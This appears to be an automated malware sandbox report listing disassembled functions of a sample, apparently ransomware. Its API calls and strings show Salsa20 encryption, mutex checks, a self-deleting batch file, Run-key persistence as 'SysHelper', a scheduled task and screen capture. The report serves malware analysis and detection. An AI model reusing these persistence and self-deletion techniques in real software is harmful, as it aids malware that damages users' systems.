                                                                                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2158581194-0
                                                                                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                        • Instruction ID: e76e354a6dbe61b98edff47a5ef08d68f14e016717c277f9264e8aa4df8f022c
                                                                                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                        • Instruction Fuzzy Hash: F5B012719C430C3BDA113641EC03F553B4C8B80B50F2000B0FA0C1C1E1A9D3F96040C9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00BA2966
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                        • Opcode ID: 9a5deb156defaeff1be7e6f4494a198a440a1cb00fdfe3dd5a4b32b32ef4f2ac
                                                                                                                                                                        • Instruction ID: 0553d740ec79b7f6fb04500b804209977ba3dcdeeec6c2492bd1c1dd552447d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a5deb156defaeff1be7e6f4494a198a440a1cb00fdfe3dd5a4b32b32ef4f2ac
                                                                                                                                                                        • Instruction Fuzzy Hash: F211B171A04219EBDB10DF59CC41BEFBBE8EF05714F004169F819A7280C7BA99158BD6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82B9
                                                                                                                                                                        • _wcscmp.LIBCMT ref: 00BC82CA
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC82E6
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00BC8568,?,00000000), ref: 00BC8310
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                                                                        • Opcode ID: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction ID: af220a9f957c7ab4669ff571d1338565ee1471354171915b10b35af14b5d9b51
                                                                                                                                                                        • Opcode Fuzzy Hash: 2560fde3ad6ba0693194845b10689d3caff6c99ea3439b01ca46514cac92ef51
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D014075204A26ABDB219E58DC89FDA37D8EF05B61F0080A9F504DB091EF70DA80C798
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00B9C090
                                                                                                                                                                        • input != nullptr && output != nullptr, xrefs: 00B9C095
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __wassert
                                                                                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                                                                                        • Opcode ID: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction ID: f9419c5b257953f51ebc710c52b9fd8ef98630dac53ca46d658eac7932b2f1c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 45c58f080f3043b5ef21c1cb3b4c06dfc72e14e9e5d1f61f2ba86ba8ca41510d
                                                                                                                                                                        • Instruction Fuzzy Hash: C4C18CB5E002099FCF54CFA9C885ADEFBF1FF48300F24856AE919E7201E334AA558B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00BA24FE
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA2509
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA251C
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA2539
                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00BA2550
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA255B
                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00BA256E
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                        • API String ID: 2372642624-488272950
                                                                                                                                                                        • Opcode ID: ad97fe9ded9a3e69714c1a41aafa4cc4e54471e9a91f3a81a26bd0f6e13ee7a4
                                                                                                                                                                        • Instruction ID: fdac842f379589111c7ec5d844147b7be0fb0e0568770eb0e58c8d148fd2b1a7
                                                                                                                                                                        • Opcode Fuzzy Hash: ad97fe9ded9a3e69714c1a41aafa4cc4e54471e9a91f3a81a26bd0f6e13ee7a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C714A76940318AFDF109BA4DC89FEE77ACFB44305F1006A6F609E6091DB759A88CF60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00BA1915
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00BA1932
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1941
                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1948
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00BA1956
                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00BA1962
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00BA1974
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA198B
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00C90260), ref: 00BA1993
                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00BA1999
                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA19A3
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA19B8
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 00BA19DC
                                                                                                                                                                          • Part of subcall function 00BA2BA0: lstrlenW.KERNEL32(?), ref: 00BA2BC9
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00BA1A01
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00BA1A04
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                        • Opcode ID: fdfca7b307e7d4db885d472694edeac048ec6b8e7e1137bf8a4e51220996082e
                                                                                                                                                                        • Instruction ID: c7857a1aa1a77c8b68f93f7c6caa31748d4ae4544756b2fd447c8f8c62e2413a
                                                                                                                                                                        • Opcode Fuzzy Hash: fdfca7b307e7d4db885d472694edeac048ec6b8e7e1137bf8a4e51220996082e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A21D835640318BFE7116BA49C89FAF7A78EF85B12F100055FA05B22D0DE741D41DBE5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                          • Part of subcall function 00BE49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                          • Part of subcall function 00BE49A0: _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C12316
                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00C12323
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00C12338
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00C12341
                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 00C1234E
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C1235C
                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 00C1236E
                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 00C123CA
                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 00C123D6
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00C12436
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00C1243D
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C1244A
                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00C12450
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                        • Opcode ID: 36b4fff9f139b63d19040c8080eddb21f66ce3bd6f94d696c8afd1ba67db3d21
                                                                                                                                                                        • Instruction ID: 21fd5e90011dca033dc27df1ed4043c29bd3cb0164a69ec04d5b2d0b8bd66d1b
                                                                                                                                                                        • Opcode Fuzzy Hash: 36b4fff9f139b63d19040c8080eddb21f66ce3bd6f94d696c8afd1ba67db3d21
                                                                                                                                                                        • Instruction Fuzzy Hash: 53418375944300AFD3105B759C86F6FBBF8FF8A711F000519FA54A62E1EBB198509BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                        • API String ID: 909875538-2733969777
                                                                                                                                                                        • Opcode ID: 654c4cc0b6a079fe87435ede0ba9ad9dcef20fa6cab864c4fd101da8c5bc4156
                                                                                                                                                                        • Instruction ID: 68e8dad617ac53ed1dd0cd441436675d2a0f22fa4b4a7e786e8ab677f5fbd798
                                                                                                                                                                        • Opcode Fuzzy Hash: 654c4cc0b6a079fe87435ede0ba9ad9dcef20fa6cab864c4fd101da8c5bc4156
                                                                                                                                                                        • Instruction Fuzzy Hash: 01F1E7716083456BD721EA64DC42FBBB7D89F54B04F0448A9FA8DD7283E7B4DA088793
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1503006713-0
                                                                                                                                                                        • Opcode ID: fa085ced43b5654e2a462c9bafaff3ccc85749c76fe9f570ac06cc4a6e3b859b
                                                                                                                                                                        • Instruction ID: dbb26f32a6604b9274beea6f45da0730fb0fc398e0a68e0bc9c33709987c63b6
                                                                                                                                                                        • Opcode Fuzzy Hash: fa085ced43b5654e2a462c9bafaff3ccc85749c76fe9f570ac06cc4a6e3b859b
                                                                                                                                                                        • Instruction Fuzzy Hash: A4219235105A01ABE7327F64DC42FFFBBD4DF51750B2444E9F484650A2EAE19810DBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00BE4B72), ref: 00BE49C7
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 00BE49D7
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00BE49FB
                                                                                                                                                                        • GetProcessWindowStation.USER32(?,00BE4B72), ref: 00BE4A01
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00BE4B72), ref: 00BE4A1C
                                                                                                                                                                        • GetLastError.KERNEL32(?,00BE4B72), ref: 00BE4A2A
                                                                                                                                                                        • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00BE4B72), ref: 00BE4A65
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BE4A8A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                        • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                        • API String ID: 2112994598-1672312481
                                                                                                                                                                        • Opcode ID: b184a37ac7376f3dfd1534dad110d88a5b9f3309d516f863412703ff77ac13ec
                                                                                                                                                                        • Instruction ID: fda63fe9db19cc9b848c4bb9679fcbed98681c3f119f511e9701d0fe40dc5f80
                                                                                                                                                                        • Opcode Fuzzy Hash: b184a37ac7376f3dfd1534dad110d88a5b9f3309d516f863412703ff77ac13ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A318935A402099BDB20DFBADC467EE77F8DF44721F1046A5E815E71E1EB709D408B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00BE4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00BE480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4AFA
                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00BE4B05
                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00BE4B27
                                                                                                                                                                          • Part of subcall function 00BBBDCC: _vfprintf_helper.LIBCMT ref: 00BBBDDF
                                                                                                                                                                        • vswprintf.LIBCMT ref: 00BE4B5D
                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00BE4B7E
                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00BE4BA2
                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00BE4BA9
                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00BE4BD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                        • Opcode ID: 769aa327a28579fb18adb5c2e8b10ca2f3d6958b50ad2db44df4a60beabf81b2
                                                                                                                                                                        • Instruction ID: 8973d0da480c0ada851154260e52dc7591aefca4fba3a7d2e6bbf8a6e55dd830
                                                                                                                                                                        • Opcode Fuzzy Hash: 769aa327a28579fb18adb5c2e8b10ca2f3d6958b50ad2db44df4a60beabf81b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 4321AF75A48340AFE770AB60CC87FEF77D8AF88701F404869B699961D0EFF494808653
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA2389
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA23B6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00BA23DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BA23E7
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA23F4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA23FF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA240E
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00BA2422
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BA237F
                                                                                                                                                                        • SysHelper, xrefs: 00BA23D6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                        • Opcode ID: 64711f333accf80da3a56e6d8af1da6a1d865288d173d4bb2c59f0bea2013448
                                                                                                                                                                        • Instruction ID: 2a9fad6a7ca438a69f12b0cef85471de875bb1c2ca286342bd7e56a2e802b1bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 64711f333accf80da3a56e6d8af1da6a1d865288d173d4bb2c59f0bea2013448
                                                                                                                                                                        • Instruction Fuzzy Hash: FB11177595030DAFDF10DBA0DC89FEE77BCFB04705F0045A5B519E2191DBB49A849B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: fa0c6424024cafd3037a70cc3c9531a7cabe4786bafa405fea23908304f77c66
                                                                                                                                                                        • Instruction ID: 8b89014aae9aa6d3e0db7305d15d94427835733d12a5580e8abad1c3244661b2
                                                                                                                                                                        • Opcode Fuzzy Hash: fa0c6424024cafd3037a70cc3c9531a7cabe4786bafa405fea23908304f77c66
                                                                                                                                                                        • Instruction Fuzzy Hash: 87C15D71708609DFDB28CF48C8C19AE77E6EF46704B244969F891CBB41DB30ED558B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9DAEB
                                                                                                                                                                        • CoCreateInstance.OLE32(00C64F6C,00000000,00000001,00C64F3C,?,?,00C5A948,000000FF), ref: 00B9DB0B
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00B9DBD6
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00C5A948,000000FF), ref: 00B9DBE3
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9DC38
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9DC92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
